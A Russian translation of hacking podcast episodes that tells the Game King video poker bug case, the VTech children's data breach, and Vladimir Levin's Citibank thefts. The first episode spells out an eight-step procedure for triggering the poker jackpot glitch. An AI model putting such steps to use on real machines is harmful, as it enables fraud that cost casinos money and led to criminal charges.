Они провели еще один день во Фримонте, чтобы убедиться, что их стратегия сработала, и, конечно же, она сработала отлично. Потом они направились в другое казино. Та же игра, та же стратегия, но это не сработало. Они пробовали множество других казино: Хилтон, Хард-Рок, Луксор, Стратосфера и Тропикана. Нигде больше это не удавалось. Они вернулись во Фримонт, но, конечно же, там все работало отлично. Эти двое были сбиты с толку, поэтому Андре решил вернуться в аэропорт и улететь домой в Пенсильванию.

В аэропорту Андре проиграл еще 700 долларов, играя в автоматы для видеопокера, но Андре все равно уехал с 8000 долларов больше, чем он прилетел. Джон вернулся в Фримонт и продолжил играть в покер. Он продолжал выигрывать и продолжал играть. Тогда менеджер игровых автоматов заметил, что все автоматы для видеопокера Game King становятся убыточными для казино. Менеджер сказал Джону, что они отключают функцию удвоения на этих машинах. Эта функция позволяла игрокам удвоить свой выигрыш или проиграть все. Джон использовал эту функцию каждый раз, когда мог, и управляющий слотами знал об этом. Джон не слишком беспокоился о том, что эта функция будет отключена. Тогда он думал, что дело в определённой последовательности клавиш. Но когда Джон вернулся на следующий день, ошибка не сработала.

Джон был сбит с толку и позвонил Андре. Андре сразу понял, что недостающим звеном их схемы была функция удвоения. С неё схема работала, а с выключенной — нет. Андре прыгнул на другой самолет и отправился обратно в Вегас. Функция удвоения в этих играх была отключена, потому что многим игрокам эта функция не нравится. Однако вы можете попросить игрового помощника включить эту функцию, и иногда они соглашаются. Джон и Андре отправились в новое казино и попросили обслуживающий персонал включить функцию «Удвоить». Андре начал играть, у него было каре, что принесло ему 500 долларов.

Он нажал волшебную последовательность кнопок и "бинго", его 500 долларов мгновенно превратились в джекпот в 10 000 долларов. Схема работала идеально и теперь они могут пойти в любое казино и заработать огромные деньги. Они были неудержимы. У них было почти бесконечное количество автоматов, где можно было выиграть десятки тысяч джекпотов. Андре смотрел на совершенно новую жизнь. Он жил на пособия по социальному обеспечению и теперь мечтал о собственном доме, покупке красивой одежды и о дорогих подарках своим друзьям. Они продолжали абузить ошибку по всему городу, пока не наткнулись на еще лучшую версию ошибки. Они обнаружили, что могут вызвать ошибку дважды за одну игру.

Тем не менее, было бы рискованно использовать эту схему постоянно. Они старались быть более аккуратными. Андре и Джон освоили свою схему. Они больше не считали это азартной игрой. По сути, они могли выиграть сколько угодно и когда угодно. Андре понял, что может зарабатывать 500 000 долларов в день, если действительно захочет. Схема работала следующим образом:



Шаг первый: найдите автомат для видеопокера Game King, который допускает разные уровни ставок.




Шаг второй: попросите оператора включить функцию «Удвоение» и будьте вежливы и обходительны, пока он вносит изменения.




Шаг третий: добавьте деньги в автомат и выберите самый низкий уровень ставки.




Шаг четвертый: играйте с наименьшей ставкой, пока не выиграете крупную комбинацию, скажем, каре или флеш-рояль.




Шаг пятый: когда на экране отображается флеш-рояль, не обналичивайте деньги. Вместо этого нажмите кнопку «Другие игры» и выберите другой вариант игры. Играйте, пока не выиграете любой выигрыш, после сработает функция удвоения. Теперь ваш следующий выигрыш будет вдвое больше, чем обычно.




Шаг шестой: добавьте больше денег в автомат.




Шаг седьмой: снова нажмите кнопку «Другие игры». Теперь выберите «Максимальный уровень ставки» и вернитесь к игре, в котором вы собрали флеш-рояль.




Шаг восьмой, нажмите кнопку Cash Out и бинго. Джекпот. Вы выиграете в десять раз больше, чем присудил вам первоначальный флеш-рояль.

Джон хотел бОльшую часть дохода, так как он рассказал Андре о уязвимости. Но Андре решил, что будет теперь играть один. За несколько дней в Вегасе Андре заработал 152 000 долларов в таких местах, как Wynn и Rio. Андре улетел обратно в Пенсильванию. Джон продолжил свою собственную серию побед, посетив восемь разных казино и выиграв более 500 000 долларов, выигрывая джекпот за джекпотом ночь за ночью.

Вернувшись домой в Пенсильванию, Андре нашел казино, в котором была игра в видеопокер Game King. Андре приводил с собой в казино свиту. Телохранитель: полицейский на пенсии, чтобы присматривать за Андре. А также его друг, который работал официантом в Red Lobster. Андре выиграл в казино еще 50 000 долларов.

Джон продолжал свои подвиги в Вегасе. Он отправился в казино Сильвертон, в то самое, где русалки плавают в аквариуме. Он вошел в комнату с высокими ставками и нашел автомат для видеопокера Game King. Он попросил дежурного включить функцию удвоения и начал выигрывать джекпот за джекпотом. Сначала 4300 долларов, затем 2800 долларов, затем 4100 долларов и еще несколько.

Для каждого выигрыша требовалось, чтобы пришел менеджер и заплатил джекпот наличными, а также заполнил документы, чтобы объявить выигрыш. Затем Джон выиграл седьмой джекпот в размере 10 400 долларов, а затем восьмой джекпот в размере 8 200 долларов. Но на этот раз дежурный пришел не сразу. Джон нетерпеливо ждал. Менеджер пришёл, но сказал Джону подождать. Победная серия Джона привлекла внимание руководства казино. Они подумали, что этому парню либо невероятно повезло, либо он жульничал, поэтому они вызвали охрану и увели его в дальнюю комнату. На него надели наручники. Джон был доставлен в центр заключения округа Кларк по делу о краже и провел ночь в тюрьме.

На следующий день его отпустили, и он сразу же позвонил Андре предупредить его. Но Андре не слушал, думая, что Джон просто пытается забрать все деньги себе. Поэтому он продолжил ходить в казино со своей свитой и выигрывать. Несколькими днями позже игорный контроль из Невады посетил казино Сильвертон. Они проверили игру и не обнаружили никаких доказательств фальсификации. Они вытащили память игры и забрали записи с камер наблюдения. Они вернулись в лабораторию с записями наблюдения и смогли воспроизвести ошибку. Это была первая подобная ошибка, обнаруженная в Game King. Совет по контролю над азартными играми немедленно уведомил IGT, создателей Game King. У IGT давняя репутация надежных игр без ошибок. И Совет по контролю над азартными играми, и IGT проводят строгие проверки, чтобы гарантировать, что ничего подобного никогда не произойдёт в игре.

После дальнейшего изучения IGT обнаружила, что эта ошибка существовала в течение семи лет, и никто не знал, что она присутствовала в тысячах игр по всему миру. IGT немедленно уведомила всех своих клиентов о необходимости немедленного отключения функции удвоения. Андре понятия не имел, как много знают следователи, и думал, что Джон просто лгал, чтобы сохранить схему при себе. Андре продолжал посещать местное казино и смог выиграть более 480 000 долларов. В конце концов казино отказалось выплачивать джекпот, и Андре ушел. В 13:00 6 августа 2009 года Андре спал на диване в своей квартире, и вдруг из-за двери раздались крики. «Полиция штата, откройте!» Дверь начали таранить. Полиция ворвалась в его квартиру.

Андре увидел солдата в полном защитном снаряжении, направившего винтовку AR-15 на Андре и кричащего: «Ложись на пол!»

Полицейские схватили его и приковали наручниками к стулу. Андре два часа наблюдал, как солдаты переворачивают все в его доме. Они перевернули матрасы, открыли ящики, снесли части потолка и просмотрели его компьютер. Друг Андре, входивший в его окружение, пришел навестить Андре, но тоже был немедленно арестован за соучастие.

Полицейские конфисковали каждую копейку, найденную в квартире, и передали ее окружному прокурору. Андре было предъявлено обвинение в 698 уголовных преступлениях, от кражи до преступного сговора. Андре провел десять дней в тюрьме и был полон решимости бороться, полагая, что присяжные наверняка встанут на его сторону. Именно тогда вмешалось ФБР. Они вывели его из зала суда Пенсильвании, в котором он находился, и экстрадировали в Лас-Вегас. Теперь ему и Джону были предъявлены обвинения в федеральных преступлениях. Пока агенты ФБР провожали его до машины, у группы местных новостей была возможность взять интервью у Андре. Вот отрывок из этого интервью.

АНДРЕ: Сейчас меня арестовывают на федеральном уровне за выигрыш в игровом автомате. Пусть все увидят записи с камер наблюдения. Я нажимал кнопки на автомате в казино. Это все, что я сделал. Теперь выигрыш явно незаконен. Это невероятно. У меня 700 преступлений. Внимание: если вы играете и выигрываете в казино, а потом руководство вдруг решает, что их машины не были полностью исправны, то вас арестуют.

Это неправильно, и я думаю, что людям действительно нужно услышать все, что я сказал сегодня. Я разговаривал с адвокатами по азартным играм в Неваде. Они говорят, что я не сделал ничего плохого. Философия заключается в том, что если казино ставит машину, которая выплачивает больше, чем обычно ожидается, а человек выигрывает, при условии, что он не использует устройства или какие-либо поддельные деньги, тогда есть ничего незаконного. Это вопрос между казино и производителем этой машины.

ВЕДУЩИЙ: Джону и Андре были предъявлены обвинения в заговоре и нарушении Закона о компьютерном мошенничестве и злоупотреблениях 1986 года. Этот закон был принят для наказания хакеров, которые незаконно проникли в правительство и банки. ФБР заявило, что мошенники сознательно использовали ошибку, которая превышала допустимый уровень для доступа к машине для видеопокера, и это противоречило правилам игры в покер. Однако их защитник утверждал, что все, что позволяет им делать игра, должно считаться разрешенным доступом. Большинство взломов игровых автоматов осуществляется с помощью дополнительных устройств, таких как магниты или электрические импульсы, но Андре и Джон использовали внутриигровые функции только для управления игрой, чтобы играть так, как они хотели. Адвокат заявил, что все, что эти ребята сделали, это нажали последовательность кнопок, на которые они имели право нажимать по закону. Дело тянулось восемнадцать месяцев.

За это время в суды было передано еще несколько дел о нарушениях такого рода. Одним из них был Аарон Шварц, арестованный за скачивание академических статей без разрешения. Другой был об утечке базы данных другому сотруднику. Обвинение не выиграло ни одно из этих дел. Но ситуация Джона и Андре подвергалась тщательной проверке. 3 декабря 2013 года федералы заключили с каждым сделку: если один сдаст другого, то он не получит тюремный срок, а только условку. Джон и Андре поступили благородно решили не давать показаний.

Обвинению было нечего использовать против этих двоих, поэтому они в конечном итоге сняли обвинения и отпустили их обоих на свободу. Деньги Андре были конфискованы и возвращены обратно в казино Пенсильвании, где он их выиграли, однако IRS заявляет, что он должен задолженность по налогам в размере 239 000 долларов США со своего выигрыша, которого у него нет. Андре расстроился из-за того, что они поссорились с Джоном из-за денег. Джон и Андре мало разговаривали с тех пор, как их арестовали в 2009 году, и им обоим запретили посещать казино, в которых они выиграли, но в суде не было никаких доказательств того, что выигрыши Джона были конфискованы или возвращены. Что стало с его деньгами, сейчас неизвестно.

Джон вернулся к игре на пианино и записи песен. Уязвимые игровые автоматы до сих пор исправляются. Это не так просто, как нажать «Обновить», потому что системы не подключены к Интернету. Применение патчей к ним сложнее, и по всему миру разбросаны тысячи таких автоматов. Не все из них управляются казино, которое применяет последние исправления. Однако есть большая вероятность, что большинство машин исправлено, поэтому лучше держать свои монеты в кармане. В конце концов, казино почти не беспокоила выигрышная серия Джона и Андре, потому что это была просто дюжина казино, и в них участвовали только два парня. Если бы эта схема просочилась в каменные джунгли, где о нем услышали бы сразу сотни людей, это был бы ужасный кошмар для казино по всему миру. К счастью для казино, эти двое держали эту схему в секрете.

https://telegra.ph/EHpizod-4-Strah-i-nenavist-v-Las-Vegase-02-22

Эпизод 5: Перед вами база данных миллионов маленьких детей — что будете делать?Вступить в наш чат
Вторник, 15 декабря. Арестован подозреваемый по делу о взломе игрушек VTech Kids. Британская полиция надела наручники на 21-летнего мужчину всего несколько часов назад. По оценкам, почти 6,5 миллионов детских профилей и почти пять миллионов учетных записей взрослых были взломаны. Информация о кредитных картах не была получена, но, как сообщается, был получен доступ к именам и адресам детей, что ещё сильнее нагоняет жути. Имя подозреваемого еще не названо, но что-то подсказывает нам, что его следующие несколько дней за решеткой, вероятно, не будут такими приятными.

Ведущий: Современные дети видят, как их родители пользуются планшетами и телефонами, и они тоже хотят играть. Производители игрушек попытались извлечь из этого выгоду, предлагая планшеты и смарт-часы специально для детей. Эти удобные для детей устройства находятся в сети и подключены к Интернету, как и любой другой планшет. У них есть функции, которые позволяют ребенку отправлять сообщения со своего планшета на телефон родителей. Впрочем, не только текстовые сообщения.

Малыш может отправлять фотографии, видео или голосовые записи. VTech является одним из производителей таких устройств для детей. Когда вы покупаете планшет VTech, он просит вас зарегистрировать устройство. Они запрашивают имя родителя и физический адрес, а также имя пользователя и пароль. Затем игрушечный планшет также спрашивает, как зовут ребенка, его пол и день рождения. Он даже предлагает вам сфотографировать ребенка, использующего планшет, для настройки профиля. Угадайте, что произойдет, когда хакеры завладеют этими игрушечными планшетами...

Есть форум, посвященный взлому планшетов VTech. Чего только не найдёшь в даркнете... Один хакер разобрал эту штуку и с помощью паяльника смог проникнуть в базовую операционную систему Linux. Оттуда хакеры смогли получить к нему root-доступ. По мере того, как популярность этого форума росла, пришли совсем другие хакеры. Вместо аппаратного хакера этот парень был сетевым хакером. Он обнаружил, что планшеты часто соединяются с веб-сайтом под названием planetvtech.com. Он взглянул на этот веб-сайт и почти сразу обнаружил, что он уязвим для внедрения SQL-кода (SQL injection).

Этот код настоящая катастрофа для веб-сайта. Подобные сетевые хакеры часто уже имеют множеством скриптов и программ, которые автоматически выполняют атаку. Из чистого любопытства, с помощью нескольких нажатий клавиш, этот хакер запустил скрипт на planetvtech.com, который попытался использовать SQL. К его удивлению, это сработало. У него был полный доступ к сайту planetvtech.com. 100-процентный контроль над ним. Он обнаружил огромную базу данных и скопировал всё оттуда.

Первое, что он заметил, была таблица "Родители". В нем были следующие поля: Имя, Фамилия, Адрес электронной почты, Зашифрованный пароль, Секретный вопрос, Секретный ответ, Домашний адрес, IP-адрес. Посмотрев, хакер понял, что это база данных всех пользователей. В этой таблице значилось 4,8 миллиона человек. Он не мог поверить своим глазам.

Список из 4,8 миллионов учетных записей пользователей очень пригодился бы в даркнете. Такой большой список мог принести приличное количество биткойнов, но хакер не собирался продавать данные. Хакер еще раз взглянул на базу данных и нашел еще одну интересную таблицу под названием "Пользователи". Она содержал имена детей, дни рождения, пол и удостоверение личности их родителей. Хакер понял, что, объединив две таблицы, он может точно определить фамилию ребенка и место его проживания. Эта таблица содержала информацию о 200 000 детей. Судя по датам рождения, средний возраст ребенка составлял пять лет.

Хакер понял, что должен заставить VTech признать, что у них есть проблема с безопасностью, и исправить ее. Такая слабая защита личных данных детей была неприемлема. Хакер начал думать о способах решения проблемы. Он мог бы починить сайт сам, но это не научило бы VTech тому, как обеспечить его безопасность в будущем. Он думал о том, чтобы обратиться в VTech, но понимал, что они никогда его не послушают или попытаются все исправить и отрицать, что это когда-либо было проблемой. Хакеру потребовалось несколько дней на обдумывание.

Он решил рассказать СМИ. Таким образом, история разлетится по всему миру, и VTech придется быстро решить проблему. Он решил обратиться к Лоренцо Франчески-Биккьераи, репортеру Vice’s Motherboard. Motherboard — это новостное издание, специально освещающее истории, связанные с компьютерами. Многие репортеры по вопросам безопасности предоставляют людям множество способов связаться с ними анонимно. Хакер безопасно вышел на контакт с Лоренцо и передал ему записи о 4,8 миллионах пользователей и о 200 000 детей и попросил его раскрыть эту историю. Он ясно сказал Лоренцо, что является этичным хакером и не собирается использовать эти данные для чего-либо злонамеренного.

Теперь перед Лоренцо стояла задача придумать, что делать. Первое, что он попытался сделать, это определить, говорит ли хакер правду и являются ли эти данные настоящими. Худшее, что может сделать репортер, — это ложно обвинить кого-то в правонарушении. Это было бы клеветой. Это подорвало бы репутацию репортера, поэтому Лоренцо отправил базу данных Трою Ханту. Трой — исследователь безопасности, наиболее известный тем, что запустил веб-сайт haveibeenpwned.com. Трой ради интереса решил проверить базу данных на своих подписчиках, их у него было почти 300 000. Трой попытался среди них найти тех, кто также появился в пользовательском сливе VTech. Он нашел много совпадающих адресов электронной почты, поэтому связался с этими людьми. Он спросил, есть ли у них учетная запись VTech, и спросил, верны ли домашний адрес и интернет-провайдер.

Вот каковы были их ответы: «Да, это точно. Я зарегистрировался в VTech, чтобы загружать приложения для игрушечного ноутбука».

«Да, это мой старый адрес. Примерно в то же время я использовал веб-сайт VTech для своей дочери».

«Да, я получил доступ к VTech Learning Lodge в 2014 году после покупки Cora Cub для своего ребенка».

В этот момент Трой убедился, что найденные хакером таблицы, были настоящими, и рассказал об этом Лоренцо.

К тому времени Лоренцо уже несколько раз обращался в VTech. Несколько дней спустя, Лоренцо получил следующий ответ от представителя VTech по имени Грейс Пинг: «14 ноября неавторизованная сторона получила доступ к данным клиентов VTech в нашей базе данных клиентов магазина приложений Learning Lodge. Мы не знали об этом несанкционированном доступе, пока вы не предупредили нас». VTech утверждает, что они получили электронное письмо от Лоренцо, нашли доказательства взлома на следующий день, а затем через три дня выпустили пресс-релиз и уведомили своих клиентов по электронной почте. Их первоначальное заявление для прессы было расплывчатым и неясным относительно того, что было взято и на кого это повлияло. Также говорится, что пароли были зашифрованы, но технически хеширование MD5 не является методом шифрования.

Однако они заблокировали следующие сайты: planetvtech.com, vsmilelink.com и sleepybearlullabytime.com. Закрытие этих веб-сайтов было сложным решением для VTech. Представьте, что магазин приложений не работает на вашем телефоне больше месяца. Никаких обновлений, никаких загрузок, никакой отправки сообщений между устройствами. За это время их игрушки потеряли большую часть функциональности, но компания поступила правильно, отключив серверы. В противном случае они привлекли бы многих других хакеров и столкнулись бы с гораздо большей катастрофой.

Новости о слабой безопасности VTech быстро распространились. Родители всего мира были возмущены утечкой информации об их детях. VTech — компания, базирующаяся в Гонконге, но у них есть большой рынок в США, Испании, Великобритании, Германии и Франции. Акции VTech начали стремительно падать.

Хакер, взломавший VTech, еще раз взглянул на полученные данные. К своему удивлению, он обнаружил даже больше данных, чем предполагал изначально. Был некий каталог, в котором было 190 гигабайт данных. В нем содержится более 100 000 фотографий, сделанных детьми на планшетах, часах или ноутбуках. Он нашел все переписки. Все сообщения чата, которые были отправлены между планшетом ребенка и телефоном родителя. Изучив данные еще дальше, хакер обнаружил каталог, полный аудиофайлов. Он открыл одну и вот, что он услышал: "Я клянусь в верности флагу Соединенных Штатов Америки и Республике, за которую они стоят, одной нации под Богом и [неразборчиво]." Прослушать запись

Таких записей было тысячи. Хакер связался с Лоренцо и передал ему 190 гигабайт фотографий, многолетние журналы чатов и многочисленные голосовые записи. Несколько дней спустя Лоренцо опубликовал статью на Motherboard. Это добавило соль на раны VTech. Все больше родителей понимают, что личная информация их ребенка не была защищена.

1 декабря, через две недели после взлома, VTech опубликовал FAQ. В нем содержалась дополнительная информация о взломе. VTech утверждает, что было взято не просто 200 000 детских учетных записей, а 6,3 миллиона детских учетных записей. Но VTech не признала, что были сделаны какие-либо фотографии.

Затем сенаторы США Эдвард Марки и Джо Бартон отправили VTech письмо, в котором указывалось на Закон о защите конфиденциальности детей в Интернете, также известный как COPPA, закон, принятый в 1998 году для защиты детей в Интернете. Их письмо также состояло из девяти вопросов, на которые они хотели получить ответ от VTech, например, какую информацию вы собираете о детях младше двенадцати лет? Для чего вы используете эту информацию? Вы продаете что-нибудь из этого кому-нибудь? Какое шифрование используется для защиты данных? VTech не ответила сразу, но в конце концов они обновили свой FAQ, чтобы ответить на некоторые из этих вопросов.

Через месяц после взлома специализированный отдел по борьбе с преступностью в Англии поймал и арестовал 21-летнего мужчину в городке к западу от Лондона. Он был арестован по подозрению в несанкционированном использовании компьютера. Отдел по расследованию преступлений также изъял несколько найденных электронных устройств. Они также упомянули, что это может быть связано с VTech, но в пресс-релизе не было названо имя арестованного. Лоренцо попытался связаться с хакером, но так и не получил ответа. Через два месяца после взлома Лоренцо посетил выставку электроники и обнаружил, что один из стендов был VTech. Они запускали совершенно новую линейку продуктов. Однако они были не для детей. Они продавали умные лампочки, дверные датчики и камеры видеонаблюдения.

В следующем месяце VTech изменил условия обслуживания на своем сайте. Теперь заглавными буквами написано: ВЫ ПРИЗНАЕТЕ И СОГЛАШАЕТЕСЬ С ТЕМ, ЧТО ЛЮБАЯ ИНФОРМАЦИЯ, ОТПРАВЛЯЕМАЯ ИЛИ ПОЛУЧАЕМАЯ ВО ВРЕМЯ ИСПОЛЬЗОВАНИЯ ЭТОГО САЙТА, МОЖЕТ БЫТЬ ПЕРЕХВАЧЕНА НЕУПОЛНОМОЧЕННЫМИ СТОРОНАМИ. Похоже, что VTech думает, что они могут избавить себя от любых нарушений, просто сообщив своим клиентам, что их данные могут быть взломаны в любое время. Их игрушки продолжают продаваться в крупных магазинах игрушек по всему миру.

В последующие недели после взлома несколько расстроенных родителей подали в суд на VTech North America. Однако судья закрыл дело, потому что истцы не смогли показать, как именно они пострадали. Судья не смог найти никаких доказательств того, что истцам была нанесена кража личных данных или какой-либо ущерб. Судья процитировал статью Лоренцо, заявив, что нарушение было совершено кем-то, у кого не было никакого намерения использовать данные злонамеренным образом. В этой истории есть обновление. 8 января 2018 года FTC действительно обнаружила, что VTech нарушила законы COPPA. VTech согласилась выплатить штраф в размере 650 000 долларов США, наложенный FTC, но они также выпустили пресс-релиз, в котором говорится, что они не нарушили никаких законов.

Мы не видели, чтобы содержимое этого взлома отображалось ни на одном сайте даркнета. Это наводит на мысль, что хакер сдержал свое обещание и не пытался извлечь выгоду из украденных данных.

Даже сейчас, много лет спустя, до сих пор неясно, что именно случилось с хакером. Мы не знаем, арестован он или нет. Мы даже не знаем ни его имени, ни его статуса. Если бы он получил только полицейское предупреждение, то история была бы окончена. Но он все еще может сидеть где-нибудь в тюрьме. Хотя хакер действительно совершил преступление, его намерением было просто повысить безопасность данных детей.

https://telegra.ph/EHpizod-5-Pered-v...te-delat-03-01

Эпизод 6: Русский хакер Владимир Левин
Вступить в наш чат

Это история первого русского хакера, осужденного в США. В историю он вошёл как создатель взлома крупнейшего банка Америки.

ВЕДУЩИЙ: На протяжении более двухсот лет ограбления банков оставались примерно одинаковыми. Идёшь в банк с пистолетом, требуешь наличные, часто с применением насилия, берёшь все, что можно, и быстро удираешь. Но по мере того, как банки начали выходить в интернет, появился совершенно новый способ ограбления банка. Это история первого ограбления онлайн-банка.

С развитием хакерства, создавалось всё больше баз данных и мануалов. В марте 1993 года был выпущен 42-й выпуск Phrack (древнейший онлайн-журнал для хакеров), и в этом выпуске был огромный список всех банков, кто пользуется локальной сетью Sprintnet.

Были подробности о том, как подключиться ко всем из них и особенности каждой системы. В этом списке был и Ситибанк. Ситибанк — крупный банк в США, штаб-квартира которого находится в Нью-Йорке. В этом выпуске Phrack сообщалось о местонахождении 363 различных компьютеров Ситибанка в сети. Ситибанк использовал локальную сеть Sprintnet для связи между своими основными офисами и другими банками, которые были к нему подключены. Офисы Ситибанка находились в Сингапуре, Маниле, Токио, Нью-Йорке, Милане, Париже, и все они были связаны через Sprintnet. Этими системами были UNIX-системы, компьютеры VAX, почтовые серверы и многое другое. Журнал обнародовал адреса всех этих систем в Ситибанке.

Пара хакеров из Санкт-Петербурга нашла эти данные и начала подключаться к компьютерам Ситибанка. Они хотели выяснить, подключен ли какой-то из них к Интернету, чтобы через их компьютеры попасть туда. В те времена подключение к Интернету было платным, но подключение к Sprintnet было бесплатным, поэтому хакеры просто хотели найти бесплатный способ выйти в Интернет.

Они потратили на это около года, но ничего не получалось. Доступы были закрыты, нужен был пароль, который они никак не могли подобрать. Но вдруг подвернулась удача. Видимо, кто-то из сотрудников забыл выйти из системы и оставил доступ открытым. Так хакеры смогли узнать и логин, и пароль. Причем не один, а сразу всех аккаунтов. Тогда, в 1994 году не было серьёзного шифрования.

Далее они просто нашли компьютер, подключенный к Интернету, и постоянно пользовались им бесплатно. Но одному из хакеров этого было мало, и он решил копнуть глубже.

Владимиру Левину было тридцать лет, он жил в Санкт-Петербурге и очень увлекался компьютерами. В то время компьютеры только-только вошли в моду, и Владимир собирал компьютеры для друзей. У него также была дневная работа, где он работал в компании-разработчике программного обеспечения. Но у него была и темная сторона.

Владимир проверил, что схема работает. Он может войти в компьютер Ситибанка и оттуда отправить деньги куда угодно. Владимир прекрасно понимал насколько это опасно. Тогда он отправил своего друга в Финляндию, чтобы отправить деньги туда и не палиться. Владимир успешно перевёл другу 400 000 долларов. Этот успех вскружил ему голову.

ИТ-персонал Ситибанка заметил это, но не успел среагировать, чтобы остановить перевод. Компьютер VAX, на котором работала их система управления денежными средствами, регистрировал каждую транзакцию, и эта показалась странной. Это были большие деньги, поэтому Ситибанк быстро позвонил в ФБР. Я (ведущий) тоже позвонил в ФБР.

СТИВ: Алло, я Стив Гарфинкель. Я отставной агент ФБР. Я провел двадцать один год в ФБР и расследовал дело Владимира Левина.

ВЕДУЩИЙ: Тогда Владимир Левин рассказал ещё одному другу об успешном переводе. Тот друг знал плохих парней: тамбовскую банду. Это банда из бывших борцов, превратившихся в обычных уличных бандитов. Банда была жесткой. Представьте себе обычную мафиозную банду. Они лезли в бизнес и угрожали владельцу расправой, если им не платили. Взамен банда крышевала бизнес. Они делали себе имя, захватывая новые территории и оставляя кровавый след за собой. Владимир встретился с этой тамбовской бандой и попросил помощи в своей схеме. Тамбовская банда охотно согласилась на этот план.

Тамбовская банда отправила в Аргентину человека, который открыл там банковский счет и сообщил Владимиру номер счета. Владимир пошел на работу, включил свой компьютер, подключился к Sprintnet, зашел в компьютер Ситибанка и набрал команды для осуществления перевода. Деньги были переведены на банковский счет в Аргентине. Но Ситибанк сразу поймал эту транзакцию. Они позвонили в ФБР и заморозили её. Член банды не получил деньги и сразу же скрылся из банка. Аргентинская полиция не успела его поймать. Это неудача только сильнее раззадорила Левина. Он организовал ещё одну операцию, на этот раз в Израиле.

Ситибанк снова заморозили транзакцию, а израильские копы поймали парня по имени Алексей Лошманов.

Ещё одна попытка. На этот раз Катерина в Сан-Франциско. Когда она пришла забрать деньги в один из банков, её арестовали. Вместо России поехала Катя в Нью-Йоркскую тюрьму. Там она согласилась выдать Левина. Для этого она при следователях позвонила Владимиру и фактически заставила признаться в схеме.

СТИВ: Мы получили ордер на арест Левина, но у нас не было соглашения об экстрадиции с русскими. Русские не собирались арестовывать Левина.

Пока Катерина сидела в тюрьме Владимир снова нанёс удар, на этот раз переводя 1,5 миллиона долларов в банк в Роттердам в Нидерландах. Ситибанк быстро позвонил в ФБР. Также они сразу вызвали там полицию. В банке арестовали Анатолия Лысенкова. Оказалось, он не знал, что это украденные деньги. Он был разводным дропом.

Владимир Левин продолжал попытки делать денежные переводы. В течение следующих шести месяцев он провел десятки попыток перевода на общую сумму более десяти миллионов долларов. Все попытки были сорваны Ситибанком и ФБР. ФБР сообщило российской полиции, что Левин в розыске, но Россия не собиралась его арестовывать.

Оказалось, что когда ФБР инициировали телефонный разговор Катерины и Левина, российская полиция их подслушивала.

ВЕДУЩИЙ: Российская полиция отслеживала тамбовскую банду, которая привела их к Владимиру, поэтому они прослушивали звонок в поисках информации о том, какое следующее преступление может быть совершено в России.

СТИВ: Нам сообщили, когда Владимир покинул Россию. Он летел в Голландию, но через Лондон.

ВЕДУЩИЙ: Британская полиция смогла быстро добраться до аэропорта, найти Владимира, ожидающего в зале ожидания, и арестовать его. Владимира задержали, но он отрицал свою причастность ко всему этому, говоря, что не имеет никакого отношения к взлому и заявляя о своей полной невиновности. Это заставило ФБР немного задуматься, а не ошиблись ли они. Единственным доказательством, которое у них было, был телефонный разговор между Катериной и Владимиром.

СТИВ: Российские полицейские арестовали часть тамбовской банды, и конфисковали у Левина кучу компьютеров, которые были из этого бизнеса. Я поехал в Россию посмотреть эти компьютеры. Мы нашли компьютер, который они использовали для взлома банка. Мы ужасно обрадовались. Пили водку вместе с российской полицией и ели солёные огурцы. Это, возможно, был лучший день в моей жизни.

ВЕДУЩИЙ: Теперь ФБР уверено, что они полностью разоблачили эту банду. Они арестовали главного причастного к этому хакера, изъяли компьютеры, которые использовались для этого, и арестовали четырех членов этой банды. Владимир Левин все еще находился в тюрьме в Великобритании.

После тридцатимесячного заключения в британских тюрьмах Владимир Левин был экстрадирован в США. Во время суда он признал себя виновным. Владимир Левин предпринял сорок попыток мошеннических денежных переводов на общую сумму десять миллионов долларов. Ему удалось успешно украсть 400 000 долларов, и это было до того, как в дело вмешалось ФБР. Ни Ситибанк, ни ФБР не смогли вернуть эти 400 000 долларов. Считается, что деньги использовались бандой для покупки оружия. Владимир был приговорен к трем годам лишения свободы, но тридцать месяцев, которые он провел в британских тюрьмах, засчитались, поэтому в американской тюрьме ему пришлось отсидеть меньше года. Он также был приговорен к возмещению ущерба в размере 240 000 долларов.

СТИВ: Я понятия не имею, что с ним случилось. Я даже слышал в какой-то момент, что он уехал в Восточную Европу. Он жил в Праге, и я слышал, что его убили. Я не знаю, правда ли это. Мне было бы любопытно узнать, что же на самом деле с ним произошло.

ВЕДУЩИЙ: Вероятно, после этого он сменил имя, потому что Владимир Левин вошел в учебники истории как один из самых известных хакеров всех времен. Это потому, что он был первым известным грабителем онлайн-банков. Владимир не использовал ни пистолет, ни маску, ни даже записку. В 1994 году это было действительно большое дело. После этого случая мир изменился. Больше преступлений стало совершаться онлайн.

Владимир Левин

СТИВ: Примерно год спустя ФБР сформировало свой первый отдел по расследованию компьютерных преступлений. Вот это действительно я считаю огромным изменением в правоохранительных органах.

ВЕДУЩИЙ: Удивительно воочию наблюдать цифровую трансформацию, через которую прошел наш мир за последние тридцать лет. Через несколько поколений мы будем оглядываться на 2020-е и думать, что это было так примитивно и глупо. Компьютеры и Интернет изменили жизнь каждого из нас почти во всех отношениях. Как мы встречаемся с друзьями, как заказываем еду и как ходим в школу. Как мы раскрываем преступления и даже как некоторые грабят банки.

https://telegra.ph/EHpizod-6-Russkij...ir-Levin-03-08

Эпизод 7: Внимание — вы уязвимы
Вступить в наш чат
Исследователь безопасности Кайл Ловетт купил новый роутер Asus и нашёл в нём кучу уязвимостей. Он поставил перед собой задачу устранить их не только для своего маршрутизатора, но и для тысяч других, которые также были уязвимы. Узнай, справился ли он.


ВЕДУЩИЙ: Основная работа Кайла — тестирование на проникновение. Ему платят за проверку безопасности компании, чтобы увидеть, есть ли способ, которым хакер может проникнуть в сеть. Но не об этом эта история. Эта история о том, как в 2013 году Кайл купил себе домой новый роутер.

КАЙЛ: Да, это был новый маршрутизатор Asus N66. Совсем не дешевый роутер. Тогда это была одна из самых дорогих моделей стоимостью чуть более 300 долларов.

ВЕДУЩИЙ: Кайл купил роутер, принёс его домой и заметил кое-что странное. К роутеру было подключено слишком много функций по умолчанию.

КАЙЛ: На нем установлен VPN, на нем установлен FTP-сервер, Samba для обмена файлами внутри сети. На нем также работало несколько разных веб-серверов. Я подумал, что это не может быть безопасно. Имя пользователя по умолчанию было admin, а пароль по умолчанию был также admin. Многие владельцы этого устройства, скорее всего, не меняли на нем пароль и оставили admin/admin.

